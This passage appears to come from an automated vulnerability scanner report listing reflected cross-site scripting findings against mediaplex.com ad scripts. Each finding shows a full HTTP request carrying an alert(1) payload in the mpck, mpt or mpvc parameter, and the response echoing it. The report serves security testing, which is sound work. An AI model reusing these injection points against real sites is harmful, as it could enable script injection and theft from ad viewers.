GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3Def1aa41386ba465cbce6f2b77f4d8761&mpt=ef1aa41386ba465cbce6f2b77f4d87611fd38"%3balert(1)//9d42522fa9d&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215477__campaignid=38114__zoneid=12267__UTLCA=1__cb=ddf17e17b581479ab0e43f55c6cf9b33__bk=lmvw6o__id=a9vbfmzny4mdhvaqsl5odbidj__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229295898&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:35 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 7372
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7566918/7566918/'+ st +'/[SiteName]/ef1aa41386ba465cbce6f2b77f4d87611fd38";alert(1)//9d42522fa9d';
   w_adldspsend(mcdt);

3.106. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad017"%3balert(1)//86494276aeb was submitted in the mpvc parameter. This input was echoed as ad017";alert(1)//86494276aeb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3Def1aa41386ba465cbce6f2b77f4d8761&mpt=ef1aa41386ba465cbce6f2b77f4d8761&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215477__campaignid=38114__zoneid=12267__UTLCA=1__cb=ddf17e17b581479ab0e43f55c6cf9b33__bk=lmvw6o__id=a9vbfmzny4mdhvaqsl5odbidj__oadest=ad017"%3balert(1)//86494276aeb HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308229295898&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:15:55 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 7708
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215477__campaignid=38114__zoneid=12267__UTLCA=1__cb=ddf17e17b581479ab0e43f55c6cf9b33__bk=lmvw6o__id=a9vbfmzny4mdhvaqsl5odbidj__oadest=ad017";alert(1)//86494276aebhttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3Def1aa41386ba465cbce6f2b77f4d8761&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215477__campaignid=38114__zoneid=12267__UT
...[SNIP]...

3.107. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26d38"%3balert(1)//671d9bd8fd9 was submitted in the mpck parameter. This input was echoed as 26d38";alert(1)//671d9bd8fd9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-5%3Fmpt%3D130289de165948bba5c166bb7264c05e26d38"%3balert(1)//671d9bd8fd9&mpt=130289de165948bba5c166bb7264c05e&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215481__campaignid=38114__zoneid=12267__UTLCA=1__ptm=2978__cb=cd47f36b4ab7496e97390c16d004f795__bk=lmvu9s__id=46ln11qbz1bsto50xd673hzwp__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:07:44 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 7880
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
2267__UTLCA=1__ptm=2978__cb=cd47f36b4ab7496e97390c16d004f795__bk=lmvu9s__id=46ln11qbz1bsto50xd673hzwp__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-5?mpt=130289de165948bba5c166bb7264c05e26d38";alert(1)//671d9bd8fd9\" target=\"_blank\">
...[SNIP]...

3.108. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c77"%3balert(1)//82f72eaaa57 was submitted in the mpt parameter. This input was echoed as b3c77";alert(1)//82f72eaaa57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-5%3Fmpt%3D130289de165948bba5c166bb7264c05e&mpt=130289de165948bba5c166bb7264c05eb3c77"%3balert(1)//82f72eaaa57&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215481__campaignid=38114__zoneid=12267__UTLCA=1__ptm=2978__cb=cd47f36b4ab7496e97390c16d004f795__bk=lmvu9s__id=46ln11qbz1bsto50xd673hzwp__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:07:54 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 7492
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7488927/7488927/'+ st +'/[SiteName]/130289de165948bba5c166bb7264c05eb3c77";alert(1)//82f72eaaa57';
   w_adldspsend(mcdt);

3.109. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dd56"%3balert(1)//db3aedea6f3 was submitted in the mpvc parameter. This input was echoed as 4dd56";alert(1)//db3aedea6f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-5%3Fmpt%3D130289de165948bba5c166bb7264c05e&mpt=130289de165948bba5c166bb7264c05e&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215481__campaignid=38114__zoneid=12267__UTLCA=1__ptm=2978__cb=cd47f36b4ab7496e97390c16d004f795__bk=lmvu9s__id=46ln11qbz1bsto50xd673hzwp__oadest=4dd56"%3balert(1)//db3aedea6f3 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:13 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 7828
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215481__campaignid=38114__zoneid=12267__UTLCA=1__ptm=2978__cb=cd47f36b4ab7496e97390c16d004f795__bk=lmvu9s__id=46ln11qbz1bsto50xd673hzwp__oadest=4dd56";alert(1)//db3aedea6f3http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-5%3Fmpt%3D130289de165948bba5c166bb7264c05e&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215481__campaignid=38114__zoneid=12267__UT
...[SNIP]...

3.110. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5492b"%3balert(1)//922b45be41f was submitted in the mpck parameter. This input was echoed as 5492b";alert(1)//922b45be41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3D84aef2dc9559459e9707f97f117f4cd55492b"%3balert(1)//922b45be41f&mpt=84aef2dc9559459e9707f97f117f4cd5&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215464__campaignid=38112__zoneid=12267__UTLCA=1__cb=81bc30af6a0b4d9384816a6b0dbc2323__bk=lmvur2__id=brw0mkg17v7eyt1vsvp2jnmew__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:10:55 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:09:41 GMT
ETag: "145c68-f39-4a36534e09340"
Accept-Ranges: bytes
Content-Length: 7800
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
__zoneid=12267__UTLCA=1__cb=81bc30af6a0b4d9384816a6b0dbc2323__bk=lmvur2__id=brw0mkg17v7eyt1vsvp2jnmew__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-1?mpt=84aef2dc9559459e9707f97f117f4cd55492b";alert(1)//922b45be41f\" target=\"_blank\">
...[SNIP]...

3.111. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd988"%3balert(1)//e55ccf9dad6 was submitted in the mpt parameter. This input was echoed as dd988";alert(1)//e55ccf9dad6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3D84aef2dc9559459e9707f97f117f4cd5&mpt=84aef2dc9559459e9707f97f117f4cd5dd988"%3balert(1)//e55ccf9dad6&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215464__campaignid=38112__zoneid=12267__UTLCA=1__cb=81bc30af6a0b4d9384816a6b0dbc2323__bk=lmvur2__id=brw0mkg17v7eyt1vsvp2jnmew__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:11:05 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:09:41 GMT
ETag: "145c68-f39-4a36534e09340"
Accept-Ranges: bytes
Content-Length: 7412
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7526718/7526718/'+ st +'/[SiteName]/84aef2dc9559459e9707f97f117f4cd5dd988";alert(1)//e55ccf9dad6';
   w_adldspsend(mcdt);

3.112. http://img.mediaplex.com/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7160"%3balert(1)//42ad845d1cf was submitted in the mpvc parameter. This input was echoed as e7160";alert(1)//42ad845d1cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy___Billabong_728x90_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3D84aef2dc9559459e9707f97f117f4cd5&mpt=84aef2dc9559459e9707f97f117f4cd5&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215464__campaignid=38112__zoneid=12267__UTLCA=1__cb=81bc30af6a0b4d9384816a6b0dbc2323__bk=lmvur2__id=brw0mkg17v7eyt1vsvp2jnmew__oadest=e7160"%3balert(1)//42ad845d1cf HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:11:24 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:09:41 GMT
ETag: "145c68-f39-4a36534e09340"
Accept-Ranges: bytes
Content-Length: 7748
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215464__campaignid=38112__zoneid=12267__UTLCA=1__cb=81bc30af6a0b4d9384816a6b0dbc2323__bk=lmvur2__id=brw0mkg17v7eyt1vsvp2jnmew__oadest=e7160";alert(1)//42ad845d1cfhttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-1%3Fmpt%3D84aef2dc9559459e9707f97f117f4cd5&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215464__campaignid=38112__zoneid=12267__UT
...[SNIP]...

3.113. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48377"%3balert(1)//d5c2884b3f5 was submitted in the mpck parameter. This input was echoed as 48377";alert(1)//d5c2884b3f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-4%3Fmpt%3Da66b2970212c4f1bac421f08cc24134f48377"%3balert(1)//d5c2884b3f5&mpt=a66b2970212c4f1bac421f08cc24134f&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215480__campaignid=38114__zoneid=12268__UTLCA=1__cb=44e7cc25d72e4b168d1e56e9e7e61740__bk=lmvt1a__id=cz6y2qdtfvzjhajx3r2zurq1y__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:08:25 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:08:48 GMT
ETag: "145c64-f32-4a36531b7dc00"
Accept-Ranges: bytes
Content-Length: 7793
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
__zoneid=12268__UTLCA=1__cb=44e7cc25d72e4b168d1e56e9e7e61740__bk=lmvt1a__id=cz6y2qdtfvzjhajx3r2zurq1y__oadest=http://altfarm.mediaplex.com/ad/ck/17038-128465-5934-4?mpt=a66b2970212c4f1bac421f08cc24134f48377";alert(1)//d5c2884b3f5\" target=\"_blank\">
...[SNIP]...

3.114. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e59c0"%3balert(1)//a2dd1381e85 was submitted in the mpt parameter. This input was echoed as e59c0";alert(1)//a2dd1381e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-4%3Fmpt%3Da66b2970212c4f1bac421f08cc24134f&mpt=a66b2970212c4f1bac421f08cc24134fe59c0"%3balert(1)//a2dd1381e85&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215480__campaignid=38114__zoneid=12268__UTLCA=1__cb=44e7cc25d72e4b168d1e56e9e7e61740__bk=lmvt1a__id=cz6y2qdtfvzjhajx3r2zurq1y__oadest= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:08:35 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:08:48 GMT
ETag: "145c64-f32-4a36531b7dc00"
Accept-Ranges: bytes
Content-Length: 7405
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7526703/7526703/'+ st +'/[SiteName]/a66b2970212c4f1bac421f08cc24134fe59c0";alert(1)//a2dd1381e85';
   w_adldspsend(mcdt);

3.115. http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9ebd"%3balert(1)//fefe5bd1a3a was submitted in the mpvc parameter. This input was echoed as d9ebd";alert(1)//fefe5bd1a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

